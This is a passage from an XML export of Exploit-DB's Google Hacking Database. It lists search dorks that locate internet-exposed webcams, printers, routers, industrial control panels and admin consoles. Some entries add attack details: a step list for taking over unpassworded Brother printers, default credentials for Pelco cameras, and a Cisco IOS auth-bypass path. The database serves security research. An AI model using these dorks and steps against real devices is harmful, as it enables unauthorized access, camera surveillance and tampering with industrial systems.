<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=intitle%3ALinksys+site%3Aourlinksys.com+</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4799</id>
<link>https://www.exploit-db.com/ghdb/4799</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Munin :: overview</shortDescription>
<textualDescription>intitle:Munin :: overview
Munin - Open Source System Monitoring system (No Auth)
ManhNho
</textualDescription>
<query>intitle:Munin :: overview</query>
<querystring>https://www.google.com/search?q=intitle:Munin :: overview</querystring>
<edb></edb>
<date>2018-04-30</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5843</id>
<link>https://www.exploit-db.com/ghdb/5843</link>
<category>Various Online Devices</category>
<shortDescription>intitle:NetworkCamera intext:&quot;Pan / Tilt&quot; inurl:ViewerFrame</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>intitle:NetworkCamera intext:&quot;Pan / Tilt&quot; inurl:ViewerFrame</query>
<querystring>https://www.google.com/search?q=intitle:NetworkCamera intext:&quot;Pan / Tilt&quot; inurl:ViewerFrame</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>3928</id>
<link>https://www.exploit-db.com/ghdb/3928</link>
<category>Various Online Devices</category>
<shortDescription>intitle:not accepted inurl:&quot;union+select&quot; inurl:&quot;id?=&quot;</shortDescription>
<textualDescription>Find IDS and Mod security
dork: intitle:not accepted inurl:&quot;union+select&quot; inurl:&quot;id?=&quot;
</textualDescription>
<query>intitle:not accepted inurl:&quot;union+select&quot; inurl:&quot;id?=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:not accepted inurl:&quot;union+select&quot; inurl:&quot;id?=&quot;</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>8063</id>
<link>https://www.exploit-db.com/ghdb/8063</link>
<category>Various Online Devices</category>
<shortDescription>intitle:phaser inurl:/frameprop.htm</shortDescription>
<textualDescription># Google Dork: intitle:phaser inurl:/frameprop.htm
# Various Online Devices
# Date: 22/11/2022
# Exploit Author: Bilal KUŞ</textualDescription>
<query>intitle:phaser inurl:/frameprop.htm</query>
<querystring>https://www.google.com/search?q=intitle:phaser inurl:/frameprop.htm</querystring>
<edb></edb>
<date>2023-02-15</date>
<author>Bilal KUŞ</author>
</entry>
<entry>
<id>5047</id>
<link>https://www.exploit-db.com/ghdb/5047</link>
<category>Various Online Devices</category>
<shortDescription>intitle:ProFTPD Admin - V1.04</shortDescription>
<textualDescription>intitle:ProFTPD Admin - V1.04
will show you admin page, no login needed
(by XLOMBOX)
</textualDescription>
<query>intitle:ProFTPD Admin - V1.04</query>
<querystring>https://www.google.com/search?q=intitle:ProFTPD Admin - V1.04</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>XLOMBOX</author>
</entry>
<entry>
<id>5085</id>
<link>https://www.exploit-db.com/ghdb/5085</link>
<category>Various Online Devices</category>
<shortDescription>intitle:QueryService Web Service</shortDescription>
<textualDescription># Google Dork: intitle:QueryService Web Service
# Description: QueryService Web Service exposed to internet
# Date: 2019-01-27
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>intitle:QueryService Web Service</query>
<querystring>https://www.google.com/search?q=intitle:QueryService Web Service</querystring>
<edb></edb>
<date>2019-01-30</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>517</id>
<link>https://www.exploit-db.com/ghdb/517</link>
<category>Various Online Devices</category>
<shortDescription>intitle:RICOH intitle:&quot;Network Administration&quot;</shortDescription>
<textualDescription>Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600.</textualDescription>
<query>intitle:RICOH intitle:&quot;Network Administration&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3ARICOH+intitle%3A%22Network+Administration%22</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5692</id>
<link>https://www.exploit-db.com/ghdb/5692</link>
<category>Various Online Devices</category>
<shortDescription>intitle:rsview32 ext:asp</shortDescription>
<textualDescription>This dork lists all the OT systems running Rockwell Automation web servers.
Regards,
Srini
</textualDescription>
<query>intitle:rsview32 ext:asp</query>
<querystring>https://www.google.com/search?q=intitle:rsview32 ext:asp</querystring>
<edb></edb>
<date>2020-01-21</date>
<author>Srini</author>
</entry>
<entry>
<id>6932</id>
<link>https://www.exploit-db.com/ghdb/6932</link>
<category>Various Online Devices</category>
<shortDescription>intitle:series &quot;Note: It is recommended to communicate via HTTPS for entering an administrator password.&quot;</shortDescription>
<textualDescription># Exploit Title: Discover Publicly Available Devices (printer, scanner etc.)
# Google Dork: intitle:series &quot;Note: It is recommended to communicate via HTTPS for entering an administrator password.&quot;
# Date: 2021-05-14
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:series &quot;Note: It is recommended to communicate via HTTPS for entering an administrator password.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:series &quot;Note: It is recommended to communicate via HTTPS for entering an administrator password.&quot;</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>3767</id>
<link>https://www.exploit-db.com/ghdb/3767</link>
<category>Various Online Devices</category>
<shortDescription>intitle:SpectraIV-IP</shortDescription>
<textualDescription>Google dork for pelco SpectraIV-IP Dome Series cameras
Default username/password &quot;admin/admin&quot;. Author: GhOsT-PR</textualDescription>
<query>intitle:SpectraIV-IP</query>
<querystring>https://www.google.com/search?q=intitle:SpectraIV-IP</querystring>
<edb></edb>
<date>2011-12-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4237</id>
<link>https://www.exploit-db.com/ghdb/4237</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Tenda ADSL2/2+ Modem inurl:main.html</shortDescription>
<textualDescription>Description: Tenda ADSL2/2+ Modem with Wireless Router
Google search: intitle:Tenda ADSL2/2+ Modem inurl:main.html
Author: nebo_oben</textualDescription>
<query>intitle:Tenda ADSL2/2+ Modem inurl:main.html</query>
<querystring>https://www.google.com/search?q=intitle:Tenda ADSL2/2+ Modem inurl:main.html</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5831</id>
<link>https://www.exploit-db.com/ghdb/5831</link>
<category>Various Online Devices</category>
<shortDescription>intitle:ThingsBoard inurl:8080/dashboard</shortDescription>
<textualDescription># Google Dork: intitle:ThingsBoard inurl:8080/dashboard
# By using this dork, various ThingsBoard dashboards (humidity,
temperature, etc) can be found.
# Date: 26/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:ThingsBoard inurl:8080/dashboard</query>
<querystring>https://www.google.com/search?q=intitle:ThingsBoard inurl:8080/dashboard</querystring>
<edb></edb>
<date>2020-03-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1421</id>
<link>https://www.exploit-db.com/ghdb/1421</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Top &quot;Vantage Service Gateway&quot; -inurl:zyxel</shortDescription>
<textualDescription>VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp</textualDescription>
<query>intitle:Top &quot;Vantage Service Gateway&quot; -inurl:zyxel</query>
<querystring>https://www.google.com/search?q=intitle:Top+%22Vantage+Service+Gateway%22+-inurl:zyxel&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8158</id>
<link>https://www.exploit-db.com/ghdb/8158</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Web Image Monitor inurl:mainFrame.cgi</shortDescription>
<textualDescription># Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi
# Various Online Devices
# Date:14/04/2023
# Exploit Author: Hasan Ali YILDIR</textualDescription>
<query>Google Dork: Recoh Printer Properties Page</query>
<querystring>https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Hasan Ali YILDIR</author>
</entry>
<entry>
<id>4200</id>
<link>https://www.exploit-db.com/ghdb/4200</link>
<category>Various Online Devices</category>
<shortDescription>intitle:webcam 7 inurl:8080 -intext:8080</shortDescription>
<textualDescription>Dork with webcams servers.
Enjoy with the view.
Dork by Rootkit Pentester.
Regards.</textualDescription>
<query>intitle:webcam 7 inurl:8080 -intext:8080</query>
<querystring>https://www.google.com/search?q=intitle:webcam 7 inurl:8080 -intext:8080</querystring>
<edb></edb>
<date>2016-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>527</id>
<link>https://www.exploit-db.com/ghdb/527</link>
<category>Various Online Devices</category>
<shortDescription>intitle:webeye inurl:login.ml</shortDescription>
<textualDescription>This one gets you on the webinterface of Webeye webcams.</textualDescription>
<query>intitle:webeye inurl:login.ml</query>
<querystring>https://www.google.com/search?q=intitle%3Awebeye+inurl%3Alogin.ml+</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6399</id>
<link>https://www.exploit-db.com/ghdb/6399</link>
<category>Various Online Devices</category>
<shortDescription>inurl /view.shtml intext:&quot;Airport&quot;</shortDescription>
<textualDescription>inurl /view.shtml intext:&quot;Airport&quot;
</textualDescription>
<query>inurl /view.shtml intext:&quot;Airport&quot;</query>
<querystring>https://www.google.com/search?q=inurl /view.shtml intext:&quot;Airport&quot;</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>6651</id>
<link>https://www.exploit-db.com/ghdb/6651</link>
<category>Various Online Devices</category>
<shortDescription>inurl: 1051/viewer/live/index.html?lang=en</shortDescription>
<textualDescription># Google Dork inurl: 1051/viewer/live/index.html?lang=en
# Exploit Author: Emre Durmaz
</textualDescription>
<query>inurl: 1051/viewer/live/index.html?lang=en</query>
<querystring>https://www.google.com/search?q=inurl: 1051/viewer/live/index.html?lang=en</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Emre DURMAZ</author>
</entry>
<entry>
<id>6705</id>
<link>https://www.exploit-db.com/ghdb/6705</link>
<category>Various Online Devices</category>
<shortDescription>inurl: inurl:&quot;view.shtml&quot; ext:shtml</shortDescription>
<textualDescription>#Google Dork : inurl: inurl:&quot;view.shtml&quot; ext:shtml
# shows devices connected
#Exploit Author : ANURAG K P
</textualDescription>
<query>inurl: inurl:&quot;view.shtml&quot; ext:shtml</query>
<querystring>https://www.google.com/search?q=inurl: inurl:&quot;view.shtml&quot; ext:shtml</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>ANURAG K P</author>
</entry>
<entry>
<id>4347</id>
<link>https://www.exploit-db.com/ghdb/4347</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;-/monitoring&quot; &quot;statistics of JavaMelody&quot;</shortDescription>
<textualDescription>Monitoring of JavaEE applications.
Permit to visualize sql request, expire current http user sessions, gather
system information etc ...
Prunier Charles-Yves</textualDescription>
<query>inurl:&quot;-/monitoring&quot; &quot;statistics of JavaMelody&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;-/monitoring&quot; &quot;statistics of JavaMelody&quot;</querystring>
<edb></edb>
<date>2016-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4625</id>
<link>https://www.exploit-db.com/ghdb/4625</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/address/speeddial.html?start&quot; and intext:&quot;Please configure the password&quot; and intitle:&quot;Brother&quot;</shortDescription>
<textualDescription>The following dork gives the list of Brother Printers whose panels do not have an administrator password.
Steps to take control of the Brother printer ::
1. Use the dork to get the list of Brother printers whose password is not configured. The user will get output like hxxp://{URL}/address/speeddial.html?start=1&amp;pageid=10
2. Extract the URL/IP and construct a URL like hxxp://{URL}/admin/password.html
3. This URL will lead the attacker to the page where administrator password can be set.
Ankit Anubhav, NewSky Security
</textualDescription>
<query>inurl:&quot;/address/speeddial.html?start&quot; and intext:&quot;Please configure the password&quot; and intitle:&quot;Brother&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/address/speeddial.html?start&quot; and intext:&quot;Please configure the password&quot; and intitle:&quot;Brother&quot;</querystring>
<edb></edb>
<date>2017-11-29</date>
<author>Ankit Anubhav</author>
</entry>
<entry>
<id>4545</id>
<link>https://www.exploit-db.com/ghdb/4545</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/ADVANCED/COMMON/TOP&quot;</shortDescription>
<textualDescription>Finds unpassworded Epson printers
Dxtroyer</textualDescription>
<query>inurl:&quot;/ADVANCED/COMMON/TOP&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/ADVANCED/COMMON/TOP&quot;</querystring>
<edb></edb>
<date>2017-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4547</id>
<link>https://www.exploit-db.com/ghdb/4547</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/ap/recuperadocumentossql.aspx&quot;</shortDescription>
<textualDescription>AuraPortal: Internal file disclosure</textualDescription>
<query>inurl:&quot;/ap/recuperadocumentossql.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/ap/recuperadocumentossql.aspx&quot;</querystring>
<edb></edb>
<date>2017-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4562</id>
<link>https://www.exploit-db.com/ghdb/4562</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/api/index.php&quot; intitle:UniFi</shortDescription>
<textualDescription>Finds the UniFi API browser with juicy Information such as WiFi passwords
redstoner2014
</textualDescription>
<query>inurl:&quot;/api/index.php&quot; intitle:UniFi</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/api/index.php&quot; intitle:UniFi</querystring>
<edb></edb>
<date>2017-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4034</id>
<link>https://www.exploit-db.com/ghdb/4034</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/certsrv&quot; intext:&quot;Select a task&quot;</shortDescription>
<textualDescription>Microsoft Certificate Request Webpage.
Author: Felipe Molina (@felmoltor)</textualDescription>
<query>inurl:&quot;/certsrv&quot; intext:&quot;Select a task&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/certsrv&quot; intext:&quot;Select a task&quot;</querystring>
<edb></edb>
<date>2015-07-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4666</id>
<link>https://www.exploit-db.com/ghdb/4666</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/cgi-bin/filemanager/Manager.pl&quot;</shortDescription>
<textualDescription>Google dork for iDC File Manager.
iDC File Manager is a secure multi user web based File Management
System, that allows you to store, manage and share every format of
digital media, including, documents, images, audio, video, publishing
layouts, presentations and PDF files Between you and your end users.
If your Company has a requirement to distribute or share files with
customers, suppliers, remote workers or just internally, then iDC File
Manager is the best solution for you.
</textualDescription>
<query>inurl:&quot;/cgi-bin/filemanager/Manager.pl&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/filemanager/Manager.pl&quot;</querystring>
<edb></edb>
<date>2018-02-05</date>
<author>Jacobo Avariento</author>
</entry>
<entry>
<id>6695</id>
<link>https://www.exploit-db.com/ghdb/6695</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/cgi-bin/guestimage.html&quot; &quot;Menu&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/cgi-bin/guestimage.html&quot; &quot;Menu&quot;
# Various online devices.
# Date: 24/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/cgi-bin/guestimage.html&quot; &quot;Menu&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/guestimage.html&quot; &quot;Menu&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6929</id>
<link>https://www.exploit-db.com/ghdb/6929</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/cgi-bin/luci&quot; intext:&quot;Authorization Required&quot; intitle:&quot;LuCI&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/cgi-bin/luci&quot; intext:&quot;Authorization Required&quot; intitle:&quot;LuCI&quot;
# (OpenWrt Router) Various Online Devices
# Exploit Author: Shivani Arya
</textualDescription>
<query>inurl:&quot;/cgi-bin/luci&quot; intext:&quot;Authorization Required&quot; intitle:&quot;LuCI&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/luci&quot; intext:&quot;Authorization Required&quot; intitle:&quot;LuCI&quot;</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Shivani Arya</author>
</entry>
<entry>
<id>3889</id>
<link>https://www.exploit-db.com/ghdb/3889</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/cgi-mod/index.cgi&quot;</shortDescription>
<textualDescription>Returns login pages for various Barracuda Networks branded hardware spam
filters and mail archivers.
4N6 Security</textualDescription>
<query>inurl:&quot;/cgi-mod/index.cgi&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-mod/index.cgi&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5868</id>
<link>https://www.exploit-db.com/ghdb/5868</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/English/pages_WinUS/&quot; AND intitle:&quot;Top page&quot;</shortDescription>
<textualDescription># Dork #
inurl:&quot;/English/pages_WinUS/&quot; AND intitle:&quot;Top page&quot;
Various Online Devices- for Canon Printer.
</textualDescription>
<query>inurl:&quot;/English/pages_WinUS/&quot; AND intitle:&quot;Top page&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/English/pages_WinUS/&quot; AND intitle:&quot;Top page&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>6431</id>
<link>https://www.exploit-db.com/ghdb/6431</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/general/status.html&quot;</shortDescription>
<textualDescription>Dorks: inurl:/frameprop.htm
Category: Sensitive Information
Summary:
A Google dork that gives information about the Brother Printers Printer.
--
Thanks &amp; Regards,
Prasad Lingamaiah
</textualDescription>
<query>inurl:&quot;/general/status.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/general/status.html&quot;</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>4933</id>
<link>https://www.exploit-db.com/ghdb/4933</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/gitweb.cgi?&quot;</shortDescription>
<textualDescription>Google dork *description: * A web-enabled interface to the open source
distributed version control system Git
*Google Search: *inurl:&quot;/gitweb.cgi?&quot;
Submitted by: Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>inurl:&quot;/gitweb.cgi?&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/gitweb.cgi?&quot;</querystring>
<edb></edb>
<date>2018-08-27</date>
<author>Alfie</author>
</entry>
<entry>
<id>4395</id>
<link>https://www.exploit-db.com/ghdb/4395</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/graphs&quot; intext:&quot;Traffic and system resource graphing&quot;</shortDescription>
<textualDescription>View results for mikrotik graphics interfaces
inurl:&quot;/graphs&quot; intext:&quot;Traffic and system resource graphing&quot;
Verónica Ovando (AKA verovan)
</textualDescription>
<query>inurl:&quot;/graphs&quot; intext:&quot;Traffic and system resource graphing&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/graphs&quot; intext:&quot;Traffic and system resource graphing&quot;</querystring>
<edb></edb>
<date>2017-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5480</id>
<link>https://www.exploit-db.com/ghdb/5480</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/hp_login.html&quot;</shortDescription>
<textualDescription>Google Dork Submission for finding publicly facing HP Devices, usually internal switches. Leads to a login screen.
Author: MiningOmerta
</textualDescription>
<query>inurl:&quot;/hp_login.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/hp_login.html&quot;</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>4375</id>
<link>https://www.exploit-db.com/ghdb/4375</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/html/modeminfo.asp?</shortDescription>
<textualDescription>at&amp;t and NetGear router information.
Also
inurl:&quot;/html/login.asp?&quot; intext:&quot;REMOTE ACCESS IS CURRENTLY ENABLED.&quot;
-Xploit </textualDescription>
<query>inurl:&quot;/html/modeminfo.asp?</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/html/modeminfo.asp?</querystring>
<edb></edb>
<date>2016-12-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4442</id>
<link>https://www.exploit-db.com/ghdb/4442</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/HtmlAdaptor?action=&quot;</shortDescription>
<textualDescription>JBoss JMX-Console MBean Viewer
Here are also more dorks.
intitle:JMX MBean View inurl:/jmx-console/HtmlAdaptor?action
intitle:&quot;MBean Inspector&quot;
inurl:&quot;jmx-console/HtmlAdaptor?&quot; JMX MBean
-Xploit
</textualDescription>
<query>inurl:&quot;/HtmlAdaptor?action=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/HtmlAdaptor?action=&quot;</querystring>
<edb></edb>
<date>2017-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6859</id>
<link>https://www.exploit-db.com/ghdb/6859</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/index.html&quot; intitle:&quot;Unitronics PLC&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/index.html&quot; intitle:&quot;Unitronics PLC&quot;
# Various Online Devices
# Date: 07/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>inurl:&quot;/index.html&quot; intitle:&quot;Unitronics PLC&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.html&quot; intitle:&quot;Unitronics PLC&quot;</querystring>
<edb></edb>
<date>2021-04-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5679</id>
<link>https://www.exploit-db.com/ghdb/5679</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/index.php?enter=guest&quot;</shortDescription>
<textualDescription>Zabbix login portal:
inurl:&quot;/index.php?enter=guest&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?enter=guest&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?enter=guest&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6857</id>
<link>https://www.exploit-db.com/ghdb/6857</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/intouch-base/rest/nlogin&quot; intitle:&quot;InTouch&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/intouch-base/rest/nlogin&quot; intitle:&quot;InTouch&quot;
# Various Online Devices
# Date: 07/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>inurl:&quot;/intouch-base/rest/nlogin&quot; intitle:&quot;InTouch&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/intouch-base/rest/nlogin&quot; intitle:&quot;InTouch&quot;</querystring>
<edb></edb>
<date>2021-04-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>3815</id>
<link>https://www.exploit-db.com/ghdb/3815</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/level/13|14|15/exec/&quot;</shortDescription>
<textualDescription>inurl:&quot;/level/13|14|15/exec/&quot;
Cisco IOS HTTP Auth Vulnerability .. Command before exec/ . Example
exec/-/?
</textualDescription>
<query>inurl:&quot;/level/13|14|15/exec/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/level/13|14|15/exec/&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4276</id>
<link>https://www.exploit-db.com/ghdb/4276</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/owncloud/public.php&quot; -github -forum</shortDescription>
<textualDescription>Dork for shared files Owncloud.
Have Fun.
Regards.
Rootkit Pentester.</textualDescription>
<query>inurl:&quot;/owncloud/public.php&quot; -github -forum</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/owncloud/public.php&quot; -github -forum</querystring>
<edb></edb>
<date>2016-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3949</id>
<link>https://www.exploit-db.com/ghdb/3949</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/public.php?service=files&quot;</shortDescription>
<textualDescription>Search for shared files from ownCloud
Daniel Maldonado
http://caceriadespammers.com.ar</textualDescription>
<query>inurl:&quot;/public.php?service=files&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/public.php?service=files&quot;</querystring>
<edb></edb>
<date>2014-05-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4050</id>
<link>https://www.exploit-db.com/ghdb/4050</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/squid-reports/&quot; AND intitle:&quot;SARG reports&quot;</shortDescription>
<textualDescription>Search the Sarg monitoring graphs of Web Proxy SQUID3
Ing. Daniel Maldonado
http://www.caceriadespammers.com.ar</textualDescription>
<query>inurl:&quot;/squid-reports/&quot; AND intitle:&quot;SARG reports&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/squid-reports/&quot; AND intitle:&quot;SARG reports&quot;</querystring>
<edb></edb>
<date>2015-08-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4485</id>
<link>https://www.exploit-db.com/ghdb/4485</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/view/view.shtml?id=&quot;</shortDescription>
<textualDescription>Finds Axis IP cameras
Dxtroyer</textualDescription>
<query>inurl:&quot;/view/view.shtml?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/view/view.shtml?id=&quot;</querystring>
<edb></edb>
<date>2017-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6551</id>
<link>https://www.exploit-db.com/ghdb/6551</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/viewer/live.html&quot;</shortDescription>
<textualDescription>#Exploit Title : Webcams, various online devices.
#Google Dork: inurl:&quot;/viewer/live.html&quot;
#Date : 18/09/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
*Sanu Jose M*
</textualDescription>
<query>inurl:&quot;/viewer/live.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/viewer/live.html&quot;</querystring>
<edb></edb>
<date>2020-09-18</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6545</id>
<link>https://www.exploit-db.com/ghdb/6545</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/viewer/live/index.html&quot;</shortDescription>
<textualDescription># Explanation: Webcams, mostly controllable without authentication.
# Google Dork: inurl:&quot;/viewer/live/index.html&quot;
# Date: 17SEP2020
# Exploit Author: Frank Rizzuto
</textualDescription>
<query>inurl:&quot;/viewer/live/index.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/viewer/live/index.html&quot;</querystring>
<edb></edb>
<date>2020-09-17</date>
<author>Frank Rizzuto</author>
</entry>
<entry>
<id>4382</id>
<link>https://www.exploit-db.com/ghdb/4382</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/viewlsts.aspx?BaseType=&quot;</shortDescription>
<textualDescription>SharePoint Files
Also,
inurl:&quot;/mWord.aspx?doc=&quot;
inurl:&quot;/mXL.aspx?doc=%2&quot;
inurl:&quot;/mPPT.aspx?doc=&quot;
-Xploit</textualDescription>
<query>inurl:&quot;/viewlsts.aspx?BaseType=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/viewlsts.aspx?BaseType=&quot;</querystring>
<edb></edb>
<date>2017-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6985</id>
<link>https://www.exploit-db.com/ghdb/6985</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/web/guest/en/websys/webArch/mainFrame.cgi&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/web/guest/en/websys/webArch/mainFrame.cgi&quot;
# Various Online Devices
# Exploit Author: J. Igor Melo</textualDescription>
<query>inurl:&quot;/web/guest/en/websys/webArch/mainFrame.cgi&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/web/guest/en/websys/webArch/mainFrame.cgi&quot;</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>3891</id>
<link>https://www.exploit-db.com/ghdb/3891</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/webcm?getpage=&quot;</shortDescription>
<textualDescription>Returns various Actiontec (and often Qwest) branded routers' login pages.
4N6 Security</textualDescription>
<query>inurl:&quot;/webcm?getpage=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/webcm?getpage=&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4633</id>
<link>https://www.exploit-db.com/ghdb/4633</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;/websys/webArch/mainFrame.cgi&quot; -hatana</shortDescription>
<textualDescription>Finds vulnerable printers
Dxtroyer
</textualDescription>
<query>inurl:&quot;/websys/webArch/mainFrame.cgi&quot; -hatana</query>
